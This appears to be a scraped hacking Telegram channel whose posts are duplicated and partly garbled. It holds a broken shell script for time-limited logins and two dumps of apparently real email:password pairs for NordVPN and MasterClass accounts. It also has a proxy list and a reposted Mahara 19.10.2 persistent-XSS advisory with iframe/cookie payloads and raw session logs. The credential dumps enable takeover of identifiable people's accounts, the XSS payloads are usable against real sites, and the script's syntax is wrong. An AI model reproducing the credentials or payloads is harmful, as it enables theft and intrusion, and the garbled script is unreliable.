β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦shell-log in for a limited time :
call at the following three scripts and system maintenance program functions can be realized limit sign in:
1. In the specified Time to execute the script, a file named nologin will be generated under / etc. The login program will automatically determine whether the file is stored during execution. If it exists, it will not allow the user to log in. The content is:
vi /sbin/login.denied
echo "Login Denied"> / etc / nologin
chmod 700 login.denied
2. Execute the script at the specified time, delete the nologin file under / etc / to allow the user to log in, the content is:
vi /sbin/login.allowed
if [ -f / etc / nologin]; then
rm / etc / nologin
fi
chmod 700 login.allowed
3. Write a time-limited script that reads:
vi /sbin/login.rollback
if [-f /sbin/login.denied] ; then
at -f /sbin/login.denid 22:00
fi
if [-f /sbin/login.allowed]; then
at -f /sbin/login.allowed 8:00
if
chmod 744 /sbin/login.rollback is
created, put the /sbin/login.rollback script into crontab , Executed in the early morning of each day:
crontab -e
# roll login script
00 1 * * * /sbin/login.rollback
The function of this setting is: from 10:00 pm to 8:00 the next morning, the non-root user logs in, Displayed as system maintenance status.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦shell-log in for a limited time :
call at the following three scripts and system maintenance program functions can be realized limit sign in:
1. In the specified Time to execute the script, a file named nologin will be generated under / etc. The login program will automatically determine whether the file is stored during execution. If it exists, it will not allow the user to log in. The content is:
vi /sbin/login.denied
echo "Login Denied"> / etc / nologin
chmod 700 login.denied
2. Execute the script at the specified time, delete the nologin file under / etc / to allow the user to log in, the content is:
vi /sbin/login.allowed
if [ -f / etc / nologin]; then
rm / etc / nologin
fi
chmod 700 login.allowed
3. Write a time-limited script that reads:
vi /sbin/login.rollback
if [-f /sbin/login.denied] ; then
at -f /sbin/login.denid 22:00
fi
if [-f /sbin/login.allowed]; then
at -f /sbin/login.allowed 8:00
if
chmod 744 /sbin/login.rollback is
created, put the /sbin/login.rollback script into crontab , Executed in the early morning of each day:
crontab -e
# roll login script
00 1 * * * /sbin/login.rollback
The function of this setting is: from 10:00 pm to 8:00 the next morning, the non-root user logs in, Displayed as system maintenance status.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦NORDVPN NEW:
jerichosantiago1@gmail.com:23rmitkb
henrydeuel@gmail.com:hd522194
stefan.schwindl@gmx.de:P3294z4h
johnjcharlesworth@gmail.com:Pokemon123
priyamshah95@gmail.com:chikoo40
joshlambert1590@yahoo.com:Brahma25
tripp.welge@gmail.com:thurlow84
clara357@gmail.com:horse1021
govindarumi@gmail.com:Twenty20
www.ducker60@gmail.com:Michon26
mickwooly@hotmail.com:3manc1manu
gregoire.caboche@gmail.com:Biniouse123
justin.joon.yang@gmail.com:4hamashika
calpurnia53@gmail.com:lrbk53019
christianpmorgan@live.com:Mexico08
mdking97@gmail.com:9k12ak12337
fabi_warcrafgt@hotmail.com:fgt123war321
joe.saouma@gmail.com:11097c4da
dhanishs.soni@gmail.com:dhanish9199
mmcyj1@aol.com:skippy12
nkatakura1@gmail.com:kata73247
cherise-mayte@hotmail.com:Lincoln1
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦NORDVPN NEW:
jerichosantiago1@gmail.com:23rmitkb
henrydeuel@gmail.com:hd522194
stefan.schwindl@gmx.de:P3294z4h
johnjcharlesworth@gmail.com:Pokemon123
priyamshah95@gmail.com:chikoo40
joshlambert1590@yahoo.com:Brahma25
tripp.welge@gmail.com:thurlow84
clara357@gmail.com:horse1021
govindarumi@gmail.com:Twenty20
www.ducker60@gmail.com:Michon26
mickwooly@hotmail.com:3manc1manu
gregoire.caboche@gmail.com:Biniouse123
justin.joon.yang@gmail.com:4hamashika
calpurnia53@gmail.com:lrbk53019
christianpmorgan@live.com:Mexico08
mdking97@gmail.com:9k12ak12337
fabi_warcrafgt@hotmail.com:fgt123war321
joe.saouma@gmail.com:11097c4da
dhanishs.soni@gmail.com:dhanish9199
mmcyj1@aol.com:skippy12
nkatakura1@gmail.com:kata73247
cherise-mayte@hotmail.com:Lincoln1
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦FRESH PREMIUM PROXIES FROM 1 H :
103.102.13.7 8080 1 hour ago
3538 ms 23% (71) id Indonesia Elite -
117.102.9.12 3128 1 hour ago
1084 ms 8% (101) pk Pakistan Elite -
190.186.76.19 8197 1 hour ago
1090 ms 13% (85) bo Bolivia Elite -
195.140.162.188 8080 1 hour ago
704 ms 22% (82) ua Ukraine - Dnipro Elite -
192.34.62.163 3128 1 hour ago
3699 ms 13% (74) us United States - North Bergen Elite -
218.75.102.198 8000 1 hour ago
858 ms 12% (85) cn China - Hangzhou Elite -
35.220.131.188 443 1 hour ago
1240 ms 32% (83) us United States Elite -
22m 20s ago 52.52.47.251 80 Elite United States 1/0 267ms
22m 21s ago 47.91.44.217 8000 Elite United States 10/4 84ms
22m 23s ago 45.33.90.184 8080 Elite United States 1274/552 60ms
22m 23s ago 191.96.42.80 3128 Elite United States 8803/802 40ms
22m 25s ago 198.199.120.102 3128 Elite United States 6685/718 39ms
22m 25s ago 138.68.240.218 8080 Elite United States 9280/799 42ms
22m 27s ago 162.243.108.129 3128 Elite United States 9151/862 38ms
23m 13s ago 104.43.244.233 80 Elite United States 38/32 447ms
23m 17s ago 13.59.22.61 80 Elite United States 9/6 223ms
23m 29s ago 52.14.29.191 80 Elite United States 1/0 638ms
24m 13s ago 24.106.221.230 53281 Elite United States 3/1 247ms
19m 43s ago 145.239.81.69 8080 Elite Poland 1376/736 294ms
19m 45s ago 188.226.141.211 3128 Elite Netherlands 3507/681 46ms
19m 45s ago 80.187.140.26 8080 Elite Germany
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦FRESH PREMIUM PROXIES FROM 1 H :
103.102.13.7 8080 1 hour ago
3538 ms 23% (71) id Indonesia Elite -
117.102.9.12 3128 1 hour ago
1084 ms 8% (101) pk Pakistan Elite -
190.186.76.19 8197 1 hour ago
1090 ms 13% (85) bo Bolivia Elite -
195.140.162.188 8080 1 hour ago
704 ms 22% (82) ua Ukraine - Dnipro Elite -
192.34.62.163 3128 1 hour ago
3699 ms 13% (74) us United States - North Bergen Elite -
218.75.102.198 8000 1 hour ago
858 ms 12% (85) cn China - Hangzhou Elite -
35.220.131.188 443 1 hour ago
1240 ms 32% (83) us United States Elite -
22m 20s ago 52.52.47.251 80 Elite United States 1/0 267ms
22m 21s ago 47.91.44.217 8000 Elite United States 10/4 84ms
22m 23s ago 45.33.90.184 8080 Elite United States 1274/552 60ms
22m 23s ago 191.96.42.80 3128 Elite United States 8803/802 40ms
22m 25s ago 198.199.120.102 3128 Elite United States 6685/718 39ms
22m 25s ago 138.68.240.218 8080 Elite United States 9280/799 42ms
22m 27s ago 162.243.108.129 3128 Elite United States 9151/862 38ms
23m 13s ago 104.43.244.233 80 Elite United States 38/32 447ms
23m 17s ago 13.59.22.61 80 Elite United States 9/6 223ms
23m 29s ago 52.14.29.191 80 Elite United States 1/0 638ms
24m 13s ago 24.106.221.230 53281 Elite United States 3/1 247ms
19m 43s ago 145.239.81.69 8080 Elite Poland 1376/736 294ms
19m 45s ago 188.226.141.211 3128 Elite Netherlands 3507/681 46ms
19m 45s ago 80.187.140.26 8080 Elite Germany
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦what is Proxy Switcher ?
1) is a premium application for Windows that will allow you to hide your real IP, and start browsing anonymously without a sweat. It can also enable you to access blocked sites such as social networking sites and streaming sites on the fly.
2) With this anonymous browsing technique, you can get rid of certain limitations from different sites and services.
3) This may include the number of downloads or views on a certain proxy, or even a country restricted viewing of certain contents or videos. Webmasters also uses this to check country-based search engine results.
4) Proxy Switcher gives you a very easy to use proxifying solution through its user-friendly GUI. Its compatibility to almost all browsers marks it to the top choice of anonymous browsing fanatics. The application also supports the usage of password-encrypted proxies and as well as Elite or SOCKS v5 proxies. The best part of it is, it does all the proxifying stuffs automatically!
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦what is Proxy Switcher ?
1) is a premium application for Windows that will allow you to hide your real IP, and start browsing anonymously without a sweat. It can also enable you to access blocked sites such as social networking sites and streaming sites on the fly.
2) With this anonymous browsing technique, you can get rid of certain limitations from different sites and services.
3) This may include the number of downloads or views on a certain proxy, or even a country restricted viewing of certain contents or videos. Webmasters also uses this to check country-based search engine results.
4) Proxy Switcher gives you a very easy to use proxifying solution through its user-friendly GUI. Its compatibility to almost all browsers marks it to the top choice of anonymous browsing fanatics. The application also supports the usage of password-encrypted proxies and as well as Elite or SOCKS v5 proxies. The best part of it is, it does all the proxifying stuffs automatically!
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦last cve VERIFIED BY UNDERCODE :# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-21
# Vendor: https://mahara.org
# Software Link: https://launchpad.net/mahara
# CVE: N/A
π¦ Document Title:
===============
Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2217
Release Date:
=============
2020-04-21
Common Vulnerability Scoring System:
====================================
4.3
Affected Product(s):
====================
Catalyst IT Ltd.
Product: Mahara v19.10.2 - CMS (Web-Application)
https://launchpad.net/mahara & https://mahara.org
Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Mahara v19.10.2 CMS web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The persistent vulnerability is located in the
Remote attackers with low privileges are able to inject own malicious
persistent script code as files and foldernames. The injected code can
be used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector is located on
the application-side. Files are able to be reviewed in the backend by
higher privileged accounts and can be shared.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Ficheros (Files Manager)
Vulnerable Input(s):
[+] Crear Carpeta
Vulnerable File(s):
[+] groupfiles.php
Vulnerable Parameter(s):
[+] nombre
[+] descripciΓ³n
Affected Module(s):
[+] PΓ‘gina principal
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce ...
1. Open the web-application and login as regular user
2. Move inside the mygroup management
3. Open the ficheros tab on top
4. Inject test payload into the crear carpeta (Nombre & DescripciΓ³n)
input field for the pΓ‘gina principal to output
Note: The execution point occurs on edit, list and delete interaction
5. The created path listings are available for higher privileged user
account that review (Backend)
6. Successul reproduce of the persistent cross site web vulnerability!
PoC: Vulnerable Source (Inject via Crear Carpeta Input for PΓ‘gina Principal)
<tr id="file:7191" class="file-item folder no-hover ui-droppable">
<td class="icon-cell">
<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191"
tabindex="0">
<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
<span class="icon-folder-open icon icon-lg " role="presentation"
aria-hidden="true"></span>
</div></td>
<td class="filename">
<a
href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27"
π¦last cve VERIFIED BY UNDERCODE :# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-21
# Vendor: https://mahara.org
# Software Link: https://launchpad.net/mahara
# CVE: N/A
π¦ Document Title:
===============
Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2217
Release Date:
=============
2020-04-21
Common Vulnerability Scoring System:
====================================
4.3
Affected Product(s):
====================
Catalyst IT Ltd.
Product: Mahara v19.10.2 - CMS (Web-Application)
https://launchpad.net/mahara & https://mahara.org
Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Mahara v19.10.2 CMS web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The persistent vulnerability is located in the
nombre anddescripciΓ³n parameters of the Ficheros module in thegroupfiles.php file.Remote attackers with low privileges are able to inject own malicious
persistent script code as files and foldernames. The injected code can
be used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector is located on
the application-side. Files are able to be reviewed in the backend by
higher privileged accounts and can be shared.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Ficheros (Files Manager)
Vulnerable Input(s):
[+] Crear Carpeta
Vulnerable File(s):
[+] groupfiles.php
Vulnerable Parameter(s):
[+] nombre
[+] descripciΓ³n
Affected Module(s):
[+] PΓ‘gina principal
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce ...
1. Open the web-application and login as regular user
2. Move inside the mygroup management
3. Open the ficheros tab on top
4. Inject test payload into the crear carpeta (Nombre & DescripciΓ³n)
input field for the pΓ‘gina principal to output
Note: The execution point occurs on edit, list and delete interaction
5. The created path listings are available for higher privileged user
account that review (Backend)
6. Successul reproduce of the persistent cross site web vulnerability!
PoC: Vulnerable Source (Inject via Crear Carpeta Input for PΓ‘gina Principal)
<tr id="file:7191" class="file-item folder no-hover ui-droppable">
<td class="icon-cell">
<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191"
tabindex="0">
<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
<span class="icon-folder-open icon icon-lg " role="presentation"
aria-hidden="true"></span>
</div></td>
<td class="filename">
<a
href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27"
mahara.org
Home - Mahara ePortfolio System
Mahara is an open source ePortfolio and social networking web application.
It provides people with tools to create and maintain a digital portfolio of their learning and social networking features to allow them to interact with each other.
It provides people with tools to create and maintain a digital portfolio of their learning and social networking features to allow them to interact with each other.
id="changefolder:7191" class="inner-link changefolder">
<span class="sr-only">Carpeta:</span>
<span class="display-title ">>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
</a></td>
<td class="filedescription d-none d-md-table-cell">
>"<iframe></iframe> >"<iframe></iframe></td>
<td class="filesize"></td>
<td class="filedate">20/04/2020</td>
<!-- Ensure space for 3 buttons (in the case of a really long single
line string in a user input field -->
<td class="text-right control-buttons ">
<div class="btn-group">
... ...
<button name="files_filebrowser_edit[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-pencil-alt icon-lg" role="presentation"
aria-hidden="true"></span>
<span class="sr-only">Edit folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span></button>
<button name="files_filebrowser_delete[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-trash-alt text-danger icon-lg"
role="presentation" aria-hidden="true"></span>
<span class="sr-only">Delete folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span>
</button></div></td>
--- PoC Session Logs [POST] --- (Mygroup Ficheros)
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------98107146915324237501974151621
Content-Length: 4879
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=PΓ‘gina
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0&
files_filebrowser_edit_title=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on&
files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=&
files_filebrowser_edit_licensor=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on&
files_filebrowser_update[7191]=Guardar
cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2-
<span class="sr-only">Carpeta:</span>
<span class="display-title ">>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
</a></td>
<td class="filedescription d-none d-md-table-cell">
>"<iframe></iframe> >"<iframe></iframe></td>
<td class="filesize"></td>
<td class="filedate">20/04/2020</td>
<!-- Ensure space for 3 buttons (in the case of a really long single
line string in a user input field -->
<td class="text-right control-buttons ">
<div class="btn-group">
... ...
<button name="files_filebrowser_edit[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-pencil-alt icon-lg" role="presentation"
aria-hidden="true"></span>
<span class="sr-only">Edit folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span></button>
<button name="files_filebrowser_delete[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-trash-alt text-danger icon-lg"
role="presentation" aria-hidden="true"></span>
<span class="sr-only">Delete folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span>
</button></div></td>
--- PoC Session Logs [POST] --- (Mygroup Ficheros)
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------98107146915324237501974151621
Content-Length: 4879
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=PΓ‘gina
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0&
files_filebrowser_edit_title=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on&
files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=&
files_filebrowser_edit_licensor=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on&
files_filebrowser_update[7191]=Guardar
cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2-
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
-
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------126319663526561351602937008964
Content-Length: 3721
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=PΓ‘gina
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=&
files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=&
sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2
Reference(s):
https://mahara_cms.localhost:8080/artefact/
https://mahara_cms.localhost:8080/artefact/file/
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php
π¦last cve VERIFIED BY UNDERCODE :# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
-
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------126319663526561351602937008964
Content-Length: 3721
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=PΓ‘gina
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=&
files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=&
sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2
Reference(s):
https://mahara_cms.localhost:8080/artefact/
https://mahara_cms.localhost:8080/artefact/file/
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php
π¦last cve VERIFIED BY UNDERCODE :# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ MasterClass Premium Accounts CHECKED :
T.me/UndercodeTesting
jewelwings@gmail.com:quiche99 | Annual Pass = true | Ends at = 2020-12-22
carliffrizal.carleel@gmail.com:millionaire | Annual Pass = true | Ends at = 2021-01-17
robertwy@yahoo.com:rdwjed12 | Annual Pass = true | Ends at = 2021-01-02
davidgartside2@gmail.com:Lockheed35 | Annual Pass = true | Ends at = 2021-03-23
mistyt@Sympatico.ca:Eastliberty55 | Pass = true | Ends at = 2020-12-26
vlittle08@gmail.com:shelby11 | Pass = true | Ends at = 2020-08-24
sarahdavos@gmail.com:bora2012 Annual Pass = true | Ends at = 2020-12-27
jazyarlene@yahoo.com:arlene93 | Annual Pass = true | Ends at = 2021-03-31
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ MasterClass Premium Accounts CHECKED :
T.me/UndercodeTesting
jewelwings@gmail.com:quiche99 | Annual Pass = true | Ends at = 2020-12-22
carliffrizal.carleel@gmail.com:millionaire | Annual Pass = true | Ends at = 2021-01-17
robertwy@yahoo.com:rdwjed12 | Annual Pass = true | Ends at = 2021-01-02
davidgartside2@gmail.com:Lockheed35 | Annual Pass = true | Ends at = 2021-03-23
mistyt@Sympatico.ca:Eastliberty55 | Pass = true | Ends at = 2020-12-26
vlittle08@gmail.com:shelby11 | Pass = true | Ends at = 2020-08-24
sarahdavos@gmail.com:bora2012 Annual Pass = true | Ends at = 2020-12-27
jazyarlene@yahoo.com:arlene93 | Annual Pass = true | Ends at = 2021-03-31
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦top 4 secure linux distro 2020 avaible for download :
1) tails os
> https://tails.boum.org/install/index.en.html
2) https://www.parrotsec.org/download-security.php
3) https://www.whonix.org/wiki/Download
4) kali.org
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦top 4 secure linux distro 2020 avaible for download :
1) tails os
> https://tails.boum.org/install/index.en.html
2) https://www.parrotsec.org/download-security.php
3) https://www.whonix.org/wiki/Download
4) kali.org
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hack like expert -Wapiti is a free open-source command-line based vulnerability scanner written in Python. While itβs not the most popular tool in this field, it does a good job of finding security flaws in many web applications.
t.me/undercodeTesting
π¦Using Wapiti can help you to discover security holes including:
F E A T U R E S :
XSS attacks
SQL injections
XPath injections
XXE injections
CRLF injections
Server side request forgery
Other features include:
Runs in verbose mode
Ability to pause and resume scans.
Highlights vulnerabilities found inside the terminal
Generates reports and export into HTML, XML, JSON and TXT
Activates and deactivates multiple attack modules
Removes parameters from certain URLs
Excludes URLs during an attack
Bypasses SSL certificate verification
URL extractor from javascript
Timeout configuration for large scans
Sets custom user-agent and HTTP headers
π¦πβπππΈπππππΈπππβ & βπβ :
